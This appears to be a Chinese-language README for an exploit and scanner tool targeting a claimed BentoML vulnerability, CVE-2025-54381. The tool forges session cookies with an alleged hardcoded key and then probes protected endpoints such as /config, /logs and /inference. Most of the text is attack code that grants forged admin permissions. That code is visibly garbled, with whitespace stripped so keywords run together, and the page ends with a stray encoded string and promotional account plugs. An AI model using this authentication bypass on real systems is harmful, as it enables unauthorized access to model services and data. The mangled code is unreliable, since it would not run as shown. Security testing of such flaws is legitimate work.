BentoML会话Cookie漏洞（CVE-2025-54381）分析工具

BentoML会话Cookie漏洞（CVE-2025-54381）分析工具

项目描述

本工具用于分析和复现BentoML框架中的关键安全漏洞（CVE-2025-54381）。该漏洞存在于BentoML版本0.15.0及更早版本中，由于使用硬编码的会话cookie密钥（_bento_session），攻击者可以生成有效的会话令牌，从而绕过身份验证机制直接访问受保护的API端点。这个漏洞特别危险，因为它允许未经授权的用户访问机器学习模型推理、管理接口等敏感功能。

功能特性

• 漏洞检测：自动检测目标BentoML实例是否存在CVE-2025-54381漏洞
• 会话伪造：利用硬编码密钥生成有效的会话cookie
• API端点扫描：识别可访问的受保护API端点
• POC生成：提供完整的漏洞验证代码
• 批量检测：支持对多个目标进行批量漏洞扫描
• 报告生成：自动生成详细的安全评估报告

安装指南

环境要求

• Python 3.7或更高版本
• 网络访问权限
• 基本的Python环境

安装步骤

1. 克隆项目代码到本地：

   gitclone https://github.com/username/bentoml_CVE-2025-54381.gitcdbentoml_CVE-2025-54381

2. 安装必要的依赖：

   pipinstall-r requirements.txt

3. 确保Python环境已正确配置，可以直接运行脚本：

   python exploit_bentoml.py

使用说明

基础使用示例

以下是使用该工具检测BentoML漏洞的基本示例：

# 导入必要的模块importrequestsimporthashlibimportjsonimportbase64# 设置目标URL和硬编码密钥URL="http://127.0.0.1:5000"SECRET_KEY=b"please_change_this"# 生成会话cookie的函数defgenerate_session_cookie(data):# 对数据进行序列化和编码data_json=json.dumps(data,separators=(',',':'))data_encoded=base64.b64encode(data_json.encode('utf-8')).decode('utf-8')# 计算HMAC签名importhmac signature=hmac.new(SECRET_KEY,data_encoded.encode('utf-8'),hashlib.sha256).hexdigest()# 返回完整的会话cookiereturnf"{data_encoded}.{signature}"# 检查API可访问性defcheck_access(session_cookie):headers={'Cookie':f'_bento_session={session_cookie}'}# 尝试访问需要认证的端点endpoints=["/metrics",# 监控指标"/healthz",# 健康检查"/apis",# API列表"/config",# 配置信息"/logs"# 日志文件]accessible_endpoints=[]forendpointinendpoints:try:response=requests.get(f"{URL}{endpoint}",headers=headers,timeout=5)ifresponse.status_code==200:accessible_endpoints.append(endpoint)print(f"✓ 成功访问:{endpoint}")print(f" 响应内容:{response.text[:200]}...")else:print(f"✗ 无法访问:{endpoint}(状态码:{response.status_code})")exceptExceptionase:print(f"✗ 访问错误:{endpoint}-{str(e)}")returnaccessible_endpoints# 主函数defmain():print("开始检测BentoML CVE-2025-54381漏洞...")print(f"目标URL:{URL}")# 生成会话数据session_data={"user_id":"attacker","expires":"2099-12-31T23:59:59Z","permissions":["admin","inference","monitoring"]}# 生成会话cookiesession_cookie=generate_session_cookie(session_data)print(f"生成的会话Cookie:{session_cookie[:50]}...")# 检查API访问print("\n尝试访问受保护的API端点:")accessible=check_access(session_cookie)# 输出结果ifaccessible:print(f"\n⚠️ 漏洞确认！成功访问了{len(accessible)}个受保护的端点")print("受影响的端点:")forendpointinaccessible:print(f" -{endpoint}")else:print("\n✅ 目标可能已修复此漏洞或使用了不同的配置")if__name__=="__main__":main()

典型使用场景

1. 安全审计：渗透测试人员可以使用此工具检查BentoML部署的安全性
2. 漏洞验证：安全团队验证CVE-2025-54381漏洞的存在和影响
3. 教育研究：学习Web安全中的会话管理漏洞
4. 红队演练：在授权范围内进行安全攻击模拟

核心代码

1. 会话Cookie生成器

defgenerate_bentoml_session():""" 生成BentoML的有效会话cookie 利用硬编码的密钥生成可以绕过认证的会话令牌 """importhmacimporthashlibimportjsonimportbase64fromdatetimeimportdatetime,timedelta# 硬编码的密钥（BentoML 0.15.0及更早版本的默认值）SECRET_KEY=b"please_change_this"# 构造会话数据session_data={"user_id":"anonymous","created":datetime.utcnow().isoformat()+"Z","expires":(datetime.utcnow()+timedelta(days=365)).isoformat()+"Z","csrf_token":"exploit_token","permissions":["read","write","admin","inference","metrics"],"authed":True,"session_id":"exploit_session_"+hashlib.md5(b"exploit").hexdigest()[:16]}# 序列化和编码数据data_json=json.dumps(session_data,separators=(',',':'))data_encoded=base64.b64encode(data_json.encode('utf-8')).decode('utf-8')# 计算HMAC-SHA256签名signature=hmac.new(SECRET_KEY,data_encoded.encode('utf-8'),hashlib.sha256).hexdigest()# 构建完整的会话cookiesession_cookie=f"_bento_session={data_encoded}.{signature}"returnsession_cookie,session_data

2. API端点检测器

classBentomlVulnerabilityScanner:""" BentoML漏洞扫描器类 用于检测和验证CVE-2025-54381漏洞 """def__init__(self,target_url):""" 初始化扫描器 :param target_url: 目标BentoML实例的URL """self.target_url=target_url.rstrip('/')self.vulnerable=Falseself.accessible_endpoints=[]self.session_cookie=Nonedeftest_vulnerability(self):""" 测试目标是否存在CVE-2025-54381漏洞 :return: 布尔值表示是否易受攻击 """try:# 首先生成一个有效的会话cookiesession_cookie,_=generate_bentoml_session()self.session_cookie=session_cookie# 定义需要测试的端点test_endpoints=[("/metrics","GET"),# 监控指标("/healthz","GET"),# 健康检查("/apis","GET"),# API列表("/docs","GET"),# API文档("/config","GET"),# 配置信息("/logs","GET"),# 日志访问("/inference","POST"),# 推理接口（可能需要POST）]headers={'Cookie':session_cookie,'User-Agent':'BentoML-CVE-Scanner/1.0','Accept':'application/json'}# 测试每个端点forendpoint,methodintest_endpoints:try:ifmethod=="GET":response=requests.get(f"{self.target_url}{endpoint}",headers=headers,timeout=10,verify=False# 对于自签名证书)else:# 对于POST请求，发送空的JSON数据response=requests.post(f"{self.target_url}{endpoint}",headers=headers,json={},timeout=10,verify=False)# 检查响应ifresponse.status_code==200:self.accessible_endpoints.append({'endpoint':endpoint,'method':method,'status':response.status_code,'length':len(response.content)})self.vulnerable=Trueexceptrequests.exceptions.RequestExceptionase:continuereturnself.vulnerableexceptExceptionase:print(f"测试过程中发生错误:{str(e)}")returnFalsedefgenerate_report(self):""" 生成漏洞报告 :return: 格式化的报告字符串 """report=[]report.append("="*60)report.append("BentoML CVE-2025-54381 漏洞扫描报告")report.append("="*60)report.append(f"目标URL:{self.target_url}")report.append(f"扫描时间:{datetime.now().isoformat()}")report.append(f"漏洞状态:{'易受攻击'ifself.vulnerableelse'安全'}")ifself.vulnerable:report.append(f"\n发现的易受攻击端点 ({len(self.accessible_endpoints)}个):")forendpoint_infoinself.accessible_endpoints:report.append(f"{endpoint_info['method']}{endpoint_info['endpoint']}"f"(状态:{endpoint_info['status']}, "f"大小:{endpoint_info['length']}字节)")report.append("\n⚠️ 安全建议:")report.append(" 1. 立即升级到BentoML 0.15.1或更高版本")report.append(" 2. 更改默认的会话密钥配置")report.append(" 3. 添加额外的认证层")report.append(" 4. 限制API端点的网络访问")return"\n".join(report)

3. 漏洞验证脚本

#!/usr/bin/env python3""" BentoML CVE-2025-54381 漏洞验证脚本 用于验证目标是否受到此漏洞影响 """importsysimportargparsefromscannerimportBentomlVulnerabilityScannerdefmain():parser=argparse.ArgumentParser(description='BentoML CVE-2025-54381 漏洞验证工具',formatter_class=argparse.RawDescriptionHelpFormatter)parser.add_argument('target',help='目标BentoML实例的URL（例如：http://localhost:5000）')parser.add_argument('-o','--output',help='将报告保存到指定文件',default=None)args=parser.parse_args()print(f"[*] 开始扫描目标:{args.target}")print(f"[*] 检测CVE-2025-54381漏洞...")# 创建扫描器实例scanner=BentomlVulnerabilityScanner(args.target)# 执行漏洞测试is_vulnerable=scanner.test_vulnerability()# 生成报告report=scanner.generate_report()# 输出报告print("\n"+report)ifargs.output:withopen(args.output,'w')asf:f.write(report)print(f"[*] 报告已保存到:{args.output}")# 根据漏洞状态退出sys.exit(0ifnotis_vulnerableelse1)if__name__=="__main__":main()

这些核心代码展示了如何利用CVE-2025-54381漏洞的原理，包括会话cookie的生成、API端点的检测以及漏洞验证的完整流程。请注意，这些代码仅用于合法的安全测试和教育目的。
6HFtX5dABrKlqXeO5PUv/1qtNjcyD7/e/i8AHyzhu2SK79T7e/QSTfQdQb5Bjq/7
更多精彩内容 请关注我的个人公众号 公众号（办公AI智能小助手）
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号（网络安全技术点滴分享）